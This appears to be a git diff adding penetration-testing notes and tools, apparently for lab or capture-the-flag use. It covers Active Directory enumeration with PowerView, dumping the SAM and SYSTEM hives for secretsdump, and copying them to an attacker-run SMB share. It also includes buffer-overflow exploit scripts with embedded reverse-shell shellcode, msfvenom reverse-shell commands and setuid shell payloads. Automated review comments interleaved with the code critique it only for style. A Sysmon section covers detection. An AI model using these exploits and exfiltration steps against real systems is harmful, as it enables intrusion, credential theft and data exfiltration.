Ping Hosts +```sh +1..15 | %{echo "10.0.2.$_"; ping -n 1 10.0.2$_ | Select-String ttl} +``` + +### Using Powerview +```sh +Import-Module .\powerview.ps1 +Get-NetDomainController +(Get-NetUser).name +Get-NetUser -properties description +Get-NetUser | select -ExpandProperty lastlogon +Get-NetComputer -ping +Get-NetGroupMember "Domain Admins" +Find-DomainShare -CheckShareAccess +``` +* Enumerate Group Policy +```sh +Get-NetGPO +``` +* Trust relationship to other domains +```sh +Get-NetDomainTrust +``` +* User enumeration +```sh +Find-LocalAdminAccess +``` + diff --git a/enumeration/windows/sysinternals.md b/enumeration/windows/sysinternals.md new file mode 100644 index 0000000..c08734d --- /dev/null +++ b/enumeration/windows/sysinternals.md 
@@ -0,0 +1,97 @@ +# Sysinternals and CLI usage + +## Opening System Properties +``` +sysdm.cpl +``` + +## Installing webdav server, + +* Starting windows webclient service +``` +get-service webclient +start-service webclient +``` + +* Opening NetworkAndSharingCenter +``` +control.exe /name Microsoft.NetworkAndSharingCenter +``` +## Make sure Network Discovery is enabled, advanced settings! + +``` +Install-WindowsFeature WebDAV-Redirector –Restart +Get-WindowsFeature WebDAV-Redirector | Format-Table –Autosize +``` + +## Sigcheck +Sigcheck is a command-line utility that shows file version number, timestamp information, and digital signature details, including certificate chains. It also includes an option to check a file’s status on VirusTotal, a site that performs automated file scanning against over 40 antivirus engines, and an option to upload a file for scanning. + +* Check for unsigned files in `C:\Windows\system32` +``` +sigcheck -u -e C:\Windows\System32 +``` +* `-u` "If VirusTotal check is enabled, show files that are unknown by VirusTotal or have non-zero detection, otherwise show only unsigned files." +* `-e` "Scan executable images only (regardless of their extension)" + +## Alternate Data Stream (ADS) +By default, all data is stored in a file's main unnamed data stream, but by using the syntax 'file:stream', you are able to read and write to alternates. (official definition) +``` +streams file.txt + +notepad file.txt: +or +Get-Content -Path .\file.txt -stream ads.txt +``` + +## SDelete +SDelete is a command line utility that takes a number of options. In any given use, it allows you to delete one or more files and/or directories, or to cleanse the free space on a logical disk. + + +## TCPView +TCPView provides a more informative and conveniently presented subset of the Netstat program that ships with Windows. The TCPView download includes Tcpvcon, a command-line version with the same functionality. 
+ +``` +tcpview +tcpvcon +``` + +## Autoruns +Autoruns reports Explorer shell extensions, toolbars, browser helper objects, Winlogon notifications, auto-start services, and much more. + +## Procdump +ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. + + +## Procdump +The Process Explorer display consists of two sub-windows. The top window always shows a list of the currently active processes, including the names of their owning accounts, whereas the information displayed in the bottom window depends on the mode that Process Explorer is in: if it is in handle mode you'll see the handles that the process selected in the top window has opened; if Process Explorer is in DLL mode you'll see the DLLs and memory-mapped files that the process has loaded. + +## Procmon +Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity. + +## Psexec +PsExec is a light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software. PsExec's most powerful uses include launching interactive command-prompts on remote systems and remote-enabling tools like IpConfig that otherwise do not have the ability to show information about remote systems + + +## Winobj +WinObj is a 32-bit Windows NT program that uses the native Windows NT API (provided by NTDLL.DLL) to access and display information on the NT Object Manager's name space. + +## BGInfo +It automatically displays relevant information about a Windows computer on the desktop's background, such as the computer name, IP address, service pack version, and more + +## RegJump +This little command-line applet takes a registry path and makes Regedit open to that path. 
It accepts root keys in standard (e.g. HKEY_LOCAL_MACHINE) and abbreviated form (e.g. HKLM). + +``` +regjump HKLM +``` +* Similar to +``` +reg query HKLM +``` +Get-Item +Get-ItemProperty +``` + +## Strings +Strings just scans the file you pass it for UNICODE (or ASCII) strings of a default length of 3 or more UNICODE (or ASCII) characters. diff --git a/enumeration/windows/sysmon.md b/enumeration/windows/sysmon.md new file mode 100644 index 0000000..5941b58 --- /dev/null +++ b/enumeration/windows/sysmon.md 
@@ -0,0 +1,63 @@ +# Sysmon +Sysmon gathers detailed and high-quality logs as well as event tracing that assists in identifying anomalies in your environment. Sysmon is most commonly used in conjunction with security information and event management (SIEM) system or other log parsing solutions that aggregate, filter, and visualize events. + +## Paths +* Logfiles +``` +Applications and Services Logs/Microsoft/Windows/Sysmon/Operational +``` + +## Configuration +* [SwiftOnSecurity](https://github.com/SwiftOnSecurity/sysmon-config) +* [ION-Storm](https://github.com/ion-storm/sysmon-config/blob/develop/sysmonconfig-export.xml) + +## Installation +```sh +Downloads-SysInternalsTools C:\Sysinternals +``` + +## Best Practices +* Exclude, not include events +* CLI gives further control over filters +```sh +Get-WinEvent +``` +```sh +wevutil.exe +``` +* Know the env before implementation + +## Filtering Events +* Actions -> Filter Current Log + +### Filtering Events with Powershell +* Logged Events containing port 4444 +```sh +Get-WinEvent -Path -FilterXPath '*/System/EventID=3 and */EventData/Data[@Name="DestinationPort"] and */EventData/Data=4444' +``` +* Logged Events containing lsass.exe +```sh +Get-WinEvent -Path -FilterXPath '*/System/EventID=10 and */EventData/Data[@Name="TargetImage"] and */EventData/Data="C:\Windows\system32\lsass.exe"' +``` +* Rats and C2 +```sh +Get-WinEvent -Path -FilterXPath '*/System/EventID=3 and */EventData/Data[@Name="DestinationPort"] and */EventData/Data=' +``` + +## Evasion Techniques +* Alternate Data Streams +* Injections +* Masquerading +* Packing/Compression +* Recompiling +* Obfuscation +* Anti-Reversing Techniques +* Remote Thread (OpenThread, ResumeThread) + +### Detecting Evasion Techniques with Powershell +```sh +Get-WinEvent -Path -FilterXPath '*/System/EventID=15' +Get-WinEvent -Path -FilterXPath '*/System/EventID=8' +``` + + 
diff --git a/exfiltration/windows/loot.md b/exfiltration/windows/loot.md new file mode 100644 index 0000000..2dcfa77 --- /dev/null +++ b/exfiltration/windows/loot.md @@ -0,0 +1,14 @@ +# Loot Windows Credentials + +```sh +reg.exe save HKLM\SAM sam.bak +``` +```sh +reg.exe save HKLM\SYSTEM system.bak +``` + +* Exifiltrate and use impacket +```sh +examples/secretsdump.py -sam sam.bak -system system.bak LOCAL +``` + diff --git a/exfiltration/windows/smb_connection.md b/exfiltration/windows/smb_connection.md new file mode 100644 index 0000000..771ec6e --- /dev/null +++ b/exfiltration/windows/smb_connection.md @@ -0,0 +1,29 @@ +# Connect to Attacker SMB + +## Attacker +* Impacket smbserver on attacker +```sh +sudo examples/smbserver.py share . -smb2support -username -password +``` + +## Target +* Connect to attacker smb +```sh +net use \\\share /User: +``` +* Save data to attacker's smb +```sh +move sam.bak \\\share\sam.bak +move system.bak \\\share\system.bak +``` +* Disconnect +```sh +net use \\\share /del +``` + +## Workarounds + +* System Error 1312. User credentials need a domain +```sh +/USER:domain\user +``` diff --git a/exploit/buffer_overflow/bad_chars.py b/exploit/buffer_overflow/bad_chars.py new file mode 100755 index 0000000..a56d1a5 --- /dev/null +++ b/exploit/buffer_overflow/bad_chars.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python3 + +from __future__ import print_function +listRem = "\\x0a".split("\\x") +for x in range(1, 256): + if "{:02x}".format(x) not in listRem: + print("\\x" + "{:02x}".format(x), end='') +print() diff --git a/exploit/buffer_overflow/brainstorm.py b/exploit/buffer_overflow/brainstorm.py new file mode 100644 index 0000000..a7eaf98 --- /dev/null +++ b/exploit/buffer_overflow/brainstorm.py 
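Review bot: `listRem = "\\x0a".split("\\x")` in the bad_chars.py hunk evaluates to `['', '0a']`, so the list carries a leading empty string that is a side effect of the split rather than an intended exclusion; a literal list such as `listRem = ["0a"]` says what is meant. The `from __future__ import print_function` line is redundant under the `python3` shebang and can be dropped. The companion buffer_overflow.md in this commit says `\x00` is always excluded, but here it is skipped only because the loop starts at 1, which deserves a comment: `# range starts at 1, so \x00 is excluded implicitly`.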
@@ -0,0 +1,65 @@ +import sys +import socket + +badchars = bytearray() +listRem = [0x00] +for x in range(1, 256): + if x not in listRem: + badchars.append(x) + +buf = b"" +buf += b"\xdd\xc0\xd9\x74\x24\xf4\xbe\xd0\xdb\x95\xa8\x5d\x29" +buf += b"\xc9\xb1\x52\x31\x75\x17\x83\xc5\x04\x03\xa5\xc8\x77" +buf += b"\x5d\xb9\x07\xf5\x9e\x41\xd8\x9a\x17\xa4\xe9\x9a\x4c" +buf += b"\xad\x5a\x2b\x06\xe3\x56\xc0\x4a\x17\xec\xa4\x42\x18" +buf += b"\x45\x02\xb5\x17\x56\x3f\x85\x36\xd4\x42\xda\x98\xe5" +buf += b"\x8c\x2f\xd9\x22\xf0\xc2\x8b\xfb\x7e\x70\x3b\x8f\xcb" +buf += b"\x49\xb0\xc3\xda\xc9\x25\x93\xdd\xf8\xf8\xaf\x87\xda" +buf += b"\xfb\x7c\xbc\x52\xe3\x61\xf9\x2d\x98\x52\x75\xac\x48" +buf += b"\xab\x76\x03\xb5\x03\x85\x5d\xf2\xa4\x76\x28\x0a\xd7" +buf += b"\x0b\x2b\xc9\xa5\xd7\xbe\xc9\x0e\x93\x19\x35\xae\x70" +buf += b"\xff\xbe\xbc\x3d\x8b\x98\xa0\xc0\x58\x93\xdd\x49\x5f" +buf += b"\x73\x54\x09\x44\x57\x3c\xc9\xe5\xce\x98\xbc\x1a\x10" +buf += b"\x43\x60\xbf\x5b\x6e\x75\xb2\x06\xe7\xba\xff\xb8\xf7" +buf += b"\xd4\x88\xcb\xc5\x7b\x23\x43\x66\xf3\xed\x94\x89\x2e" +buf += b"\x49\x0a\x74\xd1\xaa\x03\xb3\x85\xfa\x3b\x12\xa6\x90" +buf += b"\xbb\x9b\x73\x36\xeb\x33\x2c\xf7\x5b\xf4\x9c\x9f\xb1" +buf += b"\xfb\xc3\x80\xba\xd1\x6b\x2a\x41\xb2\x99\xa2\x4e\x83" +buf += b"\xf6\xb6\x50\x12\x5b\x3e\xb6\x7e\x73\x16\x61\x17\xea" +buf += b"\x33\xf9\x86\xf3\xe9\x84\x89\x78\x1e\x79\x47\x89\x6b" +buf += b"\x69\x30\x79\x26\xd3\x97\x86\x9c\x7b\x7b\x14\x7b\x7b" +buf += b"\xf2\x05\xd4\x2c\x53\xfb\x2d\xb8\x49\xa2\x87\xde\x93" +buf += b"\x32\xef\x5a\x48\x87\xee\x63\x1d\xb3\xd4\x73\xdb\x3c" +buf += b"\x51\x27\xb3\x6a\x0f\x91\x75\xc5\xe1\x4b\x2c\xba\xab" +buf += b"\x1b\xa9\xf0\x6b\x5d\xb6\xdc\x1d\x81\x07\x89\x5b\xbe" +buf += b"\xa8\x5d\x6c\xc7\xd4\xfd\x93\x12\x5d\x1d\x76\xb6\xa8" +buf += b"\xb6\x2f\x53\x11\xdb\xcf\x8e\x56\xe2\x53\x3a\x27\x11" +buf += b"\x4b\x4f\x22\x5d\xcb\xbc\x5e\xce\xbe\xc2\xcd\xef\xea" + + +ip = "10.10.143.77" +port = 9999 + + +offset = 2012 +overflow = b"A" * offset +retn = 
b"\xdf\x14\x50\x62" #"BBBB" +padding = b"\x90" * 16 +payload = buf +postfix = b"" + + +buffer = overflow + retn + padding + payload + postfix + +try: + s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) + s.connect((ip, port)) + s.recv(2000) + s.send(b"pwnbot") + s.recv(2000) + print("Sending evil buffer...") + s.send(buffer) + print("Done!") + s.close() +except socket.error: + print("Could not connect: "+socket.error) diff --git a/exploit/buffer_overflow/buffer_overflow.py b/exploit/buffer_overflow/buffer_overflow.py new file mode 100755 index 0000000..c8e7c21 --- /dev/null +++ b/exploit/buffer_overflow/buffer_overflow.py 
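Review bot: The error path at the end of the hunk, `print("Could not connect: "+socket.error)`, raises a `TypeError` because `socket.error` is the exception class rather than a string, so a failed connection ends in a second traceback instead of the intended message. Bind the exception and pass it separately: `except socket.error as e:` followed by `print("Could not connect:", e)`. `import sys` at the top of the hunk is unused. The socket is closed only on the success path; `with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:` would release it on every path.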
@@ -0,0 +1,54 @@ +#!/usr/bin/env python3 + +import socket + +ip = "10.10.122.155" +port = 31337 + +prefix = "" +offset = 146 +overflow = "A" * offset +# EIP return +#retn = "BBBB" +retn = "\xc3\x14\x04\x08" +padding = "\x90" * 16 +#padding = "" +#payload = "" +payload = "\xd9\xc8\xbb\xbb\x5e\x64\xef\xd9\x74\x24\xf4\x58\x33\xc9\xb1" +payload += "\x52\x83\xc0\x04\x31\x58\x13\x03\xe3\x4d\x86\x1a\xef\x9a\xc4" +payload += "\xe5\x0f\x5b\xa9\x6c\xea\x6a\xe9\x0b\x7f\xdc\xd9\x58\x2d\xd1" +payload += "\x92\x0d\xc5\x62\xd6\x99\xea\xc3\x5d\xfc\xc5\xd4\xce\x3c\x44" +payload += "\x57\x0d\x11\xa6\x66\xde\x64\xa7\xaf\x03\x84\xf5\x78\x4f\x3b" +payload += "\xe9\x0d\x05\x80\x82\x5e\x8b\x80\x77\x16\xaa\xa1\x26\x2c\xf5" +payload += "\x61\xc9\xe1\x8d\x2b\xd1\xe6\xa8\xe2\x6a\xdc\x47\xf5\xba\x2c" +payload += "\xa7\x5a\x83\x80\x5a\xa2\xc4\x27\x85\xd1\x3c\x54\x38\xe2\xfb" +payload += "\x26\xe6\x67\x1f\x80\x6d\xdf\xfb\x30\xa1\x86\x88\x3f\x0e\xcc" +payload += "\xd6\x23\x91\x01\x6d\x5f\x1a\xa4\xa1\xe9\x58\x83\x65\xb1\x3b" +payload += "\xaa\x3c\x1f\xed\xd3\x5e\xc0\x52\x76\x15\xed\x87\x0b\x74\x7a" +payload += "\x6b\x26\x86\x7a\xe3\x31\xf5\x48\xac\xe9\x91\xe0\x25\x34\x66" +payload += "\x06\x1c\x80\xf8\xf9\x9f\xf1\xd1\x3d\xcb\xa1\x49\x97\x74\x2a" +payload += "\x89\x18\xa1\xfd\xd9\xb6\x1a\xbe\x89\x76\xcb\x56\xc3\x78\x34" +payload += "\x46\xec\x52\x5d\xed\x17\x35\x68\xfb\x10\x04\x04\xf9\x1e\x97" +payload += "\x88\x74\xf8\xfd\x22\xd1\x53\x6a\xda\x78\x2f\x0b\x23\x57\x4a" +payload += "\x0b\xaf\x54\xab\xc2\x58\x10\xbf\xb3\xa8\x6f\x9d\x12\xb6\x45" +payload += "\x89\xf9\x25\x02\x49\x77\x56\x9d\x1e\xd0\xa8\xd4\xca\xcc\x93" +payload += "\x4e\xe8\x0c\x45\xa8\xa8\xca\xb6\x37\x31\x9e\x83\x13\x21\x66" +payload += "\x0b\x18\x15\x36\x5a\xf6\xc3\xf0\x34\xb8\xbd\xaa\xeb\x12\x29" +payload += "\x2a\xc0\xa4\x2f\x33\x0d\x53\xcf\x82\xf8\x22\xf0\x2b\x6d\xa3" +payload += "\x89\x51\x0d\x4c\x40\xd2\x3d\x07\xc8\x73\xd6\xce\x99\xc1\xbb" +payload += "\xf0\x74\x05\xc2\x72\x7c\xf6\x31\x6a\xf5\xf3\x7e\x2c\xe6\x89" +payload += 
"\xef\xd9\x08\x3d\x0f\xc8"; + +#payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" +postfix = "" +buffer = prefix + overflow + retn + padding + payload + postfix + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + +try: + s.connect((ip, port)) + print("[*] Sending buffer...") + s.send(bytes(buffer + "\r\n", "latin-1")) + print("Done!") +except: + print("Could not connect") diff --git a/exploit/buffer_overflow/docs/amd64.md b/exploit/buffer_overflow/docs/amd64.md new file mode 100644 index 0000000..82f4add --- /dev/null +++ b/exploit/buffer_overflow/docs/amd64.md 
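Review bot: The bare `except:` at the end of the hunk catches every exception, including `KeyboardInterrupt` and the `TypeError`/`UnicodeEncodeError` a malformed payload would raise, and reports all of them as "Could not connect", hiding the real cause; narrow it to `except OSError as e:` and print `e`. The same bare `except:` appears in fuzzer.py, fuzzer2.py and fuzzer_BO.py in this commit. The socket `s` is never closed; wrapping the connect/send in `with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:` fixes that. `s.send` may also return after a partial write, so `s.sendall` is the right call when the whole buffer must be transmitted. The stray `;` after the last `payload +=` line is harmless but not Python style.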
@@ -0,0 +1,52 @@ +# amd64 + +* `rax` return value, caller saved. +* `r10`, `r11` are caller saved. +* `rbx`, `r12`, `r13`, `r14` are callee saved +* `rbp` is also callee saved(and can be optionally used as a frame pointer) +* `rsp` is callee saved + +## Function argument registers +* `rdi`,`rsi`,`rdx`,`rcx`,`r8 `,`r9 `, called saved. +* Further function args are stored inside its stack frame. + + +## Overwriting Variables and Padding +* Overwrite an atomic variable behind a buffer +```C +int main ( int argc, char ** argv ) { + int var = 0 + char buffer[12]; + + gets(buffer); + [...] +} +``` +* Stack layout +``` +Bottom ++------------------+ +| Saved regsisters | ++------------------+ +| int var | ++------------------+ +| char buffer [11] | +| ... | +| ... | +| ... | +| char buffer [0] | ++------------------+ +| char ** argv | ++------------------+ +| char argc | ++------------------+ +Top +``` + +* Watch out! I.e., a 12 byte array is padded to system memory allocation size. +``` ++-------------+----+ +|12 byte array| 4b | ++-------------+----+ +0 12 16 byte +``` diff --git a/exploit/buffer_overflow/docs/buffer_overflow.md b/exploit/buffer_overflow/docs/buffer_overflow.md new file mode 100644 index 0000000..c08e81c --- /dev/null +++ b/exploit/buffer_overflow/docs/buffer_overflow.md 
@@ -0,0 +1,66 @@ +# Buffer Overflow +* [Cheat Sheet](https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst) + +# Usage +* Fuzz & crash the binary pretty roughly via payload +```sh +python -c "print('A' * 3000) +``` + +## Fuzzing +* python 3 +../fuzzer.py + +* python 2 +../fuzzer2.py + +## Measure Offset +* Use as payload +```sh +/opt/metasploit/tools/exploit/pattern_create.rb -l +``` +* Find content of the payload at EIP and identify exact bufferlength +```sh +/opt/metasploit/tools/exploit/pattern_offset.rb -l -q +``` +``` +msf-pattern_offset -l -q +``` +``` +mona msfpattern -l +``` +* Fill offset variable in exploit `buffer_overflow.py` +../buffer_overflow.py + +* Execute buffer_overflow.py, EIP should contain `BBBB` + +## Find bad characters to input in the buffer +* Execute `bad_chars.py` and include it as payload. Always excluded is `\x00`. +../bad_chars.py + +* Compare stack if any bad chars block exectuion of the payload following in the next steps. +```sh +!mona bytearray -b "\x00" +!mona compare -f -a +``` + +## Find Jump Point / RoP +* Jump point to `ESP` (32 bit binary) needs to be found to put it inside `EIP` + +### Example: Immunity Debugger using mona on windows machine +```sh +!mona modules +``` +```sh +!mona jmp -r esp -m +``` +* The found address needs to be **LITTLE ENDIAN NOTATION INSIDE THE EIP VARIABLE** if x86/amd64 + +## Shellcode as Payload +* Last part is the individual shellcode, put it in the payload variable of `buffer_overflow.py` +```sh +msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f c -e x86/shikata_ga_nai -b "\x00" +msfvenom -p linux/x86/shell_reverse_tcp LHOST= -f c -e x86/shikata_ga_nai -b "\x00" +``` +* Prepend NOPs as padding before shellcode + diff --git a/exploit/buffer_overflow/docs/radare2.md b/exploit/buffer_overflow/docs/radare2.md new file mode 100644 index 0000000..5953ef1 --- /dev/null +++ b/exploit/buffer_overflow/docs/radare2.md 
@@ -0,0 +1,121 @@ +# Return Address reuse + +## via Shellcode, an examples +* Find out the address of the start of the buffer and the start address of the return address +* Calculate the difference between these addresses so you know how much data to enter to overflow +* Start out by entering the shellcode in the buffer, entering random data between the shellcode and the return address, and the address of the buffer in the return address + +* Plus NOPsled (sometimes xargs is needed in front of the app call) +```python +python -c "print('\x90' * 30 +'\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05'+ '\x41' * 60 + '\xef\xbe\xad\xde')" | xargs ./buffer-overflow +``` + +## Finding Offset +### via gdb segfault output +* 64 bit addresses use 6 out of 8 byte for addresses. +```sh +gdb ./application +run $(python -c "print('\x41' * 180)") +``` +* Return address hit completely when 6 bytes are filled. +```sh +Program received signal SIGSEGV, Segmentation fault. +0x0000414141414141 in copy_arg () +``` +* Buffer = measured_length - (`$rbp` + 6 bytes return address) + +### via metasploit +```sh +/opt/metasploit/tools/exploit/pattern_create.rb -l 180 +``` +* Looking for `rbp` Content in front of the return address to measure offset +```sh +(gdb) i r +[...] +rbp 0x 0x +[...] 
+``` +* Measure offset +```sh +pt/metasploit/tools/exploit/pattern_offset -l 180 -q +``` + +## Crafting Payload +* Contains Junk/NOPslice + shellcode + Junk over rbp + return address +* Inside gdb +```sh +run $(python -c "print('A' * 100 + + 'A' * 12 + 'B' * 6)") +``` +* Check actual stack +```sh +(gdb) x/100x $rsp-200 +0x7fffffffe228: 0x00400450 0x00000000 0xffffe3e0 0x00007fff +0x7fffffffe238: 0x00400561 0x00000000 0xf7dce8c0 0x00007fff +0x7fffffffe248: 0xffffe64d 0x00007fff 0x41414141 0x41414141 +0x7fffffffe258: 0x41414141 0x41414141 0x41414141 0x41414141 +0x7fffffffe268: 0x41414141 0x41414141 0x41414141 0x41414141 +0x7fffffffe278: 0x41414141 0x41414141 0x41414141 0x41414141 +0x7fffffffe288: 0x41414141 0x41414141 0x41414141 0x41414141 +0x7fffffffe298: 0x41414141 0x41414141 0x41414141 0x41414141 +0x7fffffffe2a8: 0x41414141 0x41414141 0x41414141 0x48583b6a +0x7fffffffe2b8: 0xb849d231 0x69622f2f 0x68732f6e 0x08e8c149 +[...] +``` +* Shellcode starts at `0x7fffffffe2b8 - 4 bytes = 0x7fffffffe2b4`. +## NopSled +* Prepend **nopsled** instead of `A` and pick an address inside as the future return address, for example `0x7fffffffe2a8`. 
+```sh +(gdb) x/100x $rsp-200 +0x7fffffffe228: 0x00400450 0x00000000 0xffffe3e0 0x00007fff +0x7fffffffe238: 0x00400561 0x00000000 0xf7dce8c0 0x00007fff +0x7fffffffe248: 0xffffe64d 0x00007fff 0x90909090 0x90909090 +0x7fffffffe258: 0x90909090 0x90909090 0x90909090 0x90909090 +0x7fffffffe268: 0x90909090 0x90909090 0x90909090 0x90909090 +0x7fffffffe278: 0x90909090 0x90909090 0x90909090 0x90909090 +0x7fffffffe288: 0x90909090 0x90909090 0x90909090 0x90909090 +0x7fffffffe298: 0x90909090 0x90909090 0x90909090 0x90909090 +0x7fffffffe2a8: 0x90909090 0x90909090 0x90909090 0x48583b6a +0x7fffffffe2b8: 0xb849d231 0x69622f2f 0x68732f6e 0x08e8c149 +``` +* Convert return address to little endian `0x7fffffffe2a8` -> `\xa8\xe2\xff\xff\xff\x7f` and put it inside the return address +```sh +run $(python -c "print('\x90'*100+'\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05'+'A'*12+'\xa8\xe2\xff\xff\xff\x7f')") +``` + +## setuid() and setreuid() +* Shellcode needs `setuid(0)` for effective root uid or the equivalent id of the account needed. +* `/bin/sh` checks real uid not effective uid +* ./shellcodes/setuid_shell.as + +### setreuid() in assembler +* [Linux Syscall Table](https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/) +* `setreuid(1002,1002)` sets the __real__ uid inside the shell to 1002. +* `setreuid()` has `rax` number `\x71` (`113` dec). Args are stored in `rdi` and `rsi`. 
+* ./shellcode/setreuid_shell.as +```sh +"\x48\x31\xFF\x48\x31\xC0\x48\x31\xF6\x66\xBE\xEA\x03\x66\xBF\xEA\x03\xB0\x71\x0F\x05\x48\x31\xD2\x48\xBB\xFF\x2F\x62\x69\x6E\x2F\x73\x68\x48\xC1\xEB\x08\x53\x48\x89\xE7\x48\x31\xC0\x50\x57\x48\x89\xE6\xB0\x3B\x0F\x05\x6A\x01\x5F\x6A\x3C\x58\x0F\x05" +``` +* Convert to hex output via [Defuse](https://defuse.ca/online-x86-assembler.htm) + +### setreuid() in shellcode using pwntools +* Shellcraft builds a shellcode containing `setreuid()`, without any parameter given the real uid to the file owner. +```sh +* [Linux Syscall Table](https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/) +shellcraft -f d amd64.linux.setreuid +``` +* The uid can be set as an argument +```sh +shellcraft -f d amd64.linux.setreuid +``` +* Prepend this in front of the existing shellcode like this +```sh +run $(python -c "print('\x90' * 99 + '\x6a\x6b\x58\x0f\x05\x48\x89\xc7\x6a\x71\x58\x48\x89\xfe\x0f\x05\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'B' * 8 + '\x88\xe2\xff\xff\xff\x7f')") +``` + * Where the existing shellcode is the following + ```sh + \x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05 + ``` + * Setreuid part is the following + ```sh + \x6a\x6b\x58\x0f\x05\x48\x89\xc7\x6a\x71\x58\x48\x89\xfe\x0f\x05 + ``` diff --git a/exploit/buffer_overflow/docs/shellcodes/setreuid_shell.as b/exploit/buffer_overflow/docs/shellcodes/setreuid_shell.as new file mode 100644 index 0000000..ef1c822 --- /dev/null +++ b/exploit/buffer_overflow/docs/shellcodes/setreuid_shell.as 
@@ -0,0 +1,23 @@ +xor rdi,rdi <------ set the rdi to 0 +xor rax,rax +xor rsi, rsi <------ set the rsi to 0 +mov si, 1002 <------ put the value 1002 in the lower bits of the rsi +mov di, 1002 <------ put the value 1002 in the lower bits of the rdi +mov al,0x71 <------ put the setruid function in the al register +syscall <------ call the function. +xor rdx,rdx +movabs rbx,0x68732f6e69622fff +shr rbx,0x8 +push rbx +mov rdi,rsp +xor rax,rax +push rax +push rdi +mov rsi,rsp +mov al,0x3b +syscall +push 0x1 +pop rdi +push 0x3c +pop rax +syscall diff --git a/exploit/buffer_overflow/docs/shellcodes/setuid_shell.as b/exploit/buffer_overflow/docs/shellcodes/setuid_shell.as new file mode 100644 index 0000000..70387ca --- /dev/null +++ b/exploit/buffer_overflow/docs/shellcodes/setuid_shell.as @@ -0,0 +1,37 @@ +etuid(0) + execve(/bin/sh) - just 4 fun. +xi4oyu [at] 80sec.com + +main(){ +__asm( "xorq %rdi,%rdi\n\t" + "mov $0x69,%al\n\t" + "syscall \n\t" + "xorq %rdx, %rdx \n\t" + "movq $0x68732f6e69622fff,%rbx; \n\t" + "shr $0x8, %rbx; \n\t" + "push %rbx; \n\t" + "movq %rsp,%rdi; \n\t" + "xorq %rax,%rax; \n\t" + "pushq %rax; \n\t" + "pushq %rdi; \n\t" + "movq %rsp,%rsi; \n\t" + "mov $0x3b,%al; \n\t" + "syscall ; \n\t" + "pushq $0x1 ; \n\t" + "pop %rdi ; \n\t" + "pushq $0x3c ; \n\t" + "pop %rax ; \n\t" + "syscall ; \n\t" +); +} +*/ +main() { + char shellcode[] = + "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62" + "\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31" + "\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c" + "\x58\x0f\x05"; + (*(void (*)()) shellcode)(); +} + +2009-05-14 +evil.xi4oyu diff --git a/exploit/buffer_overflow/fuzzer.py b/exploit/buffer_overflow/fuzzer.py new file mode 100755 index 0000000..6bc6480 --- /dev/null +++ b/exploit/buffer_overflow/fuzzer.py 
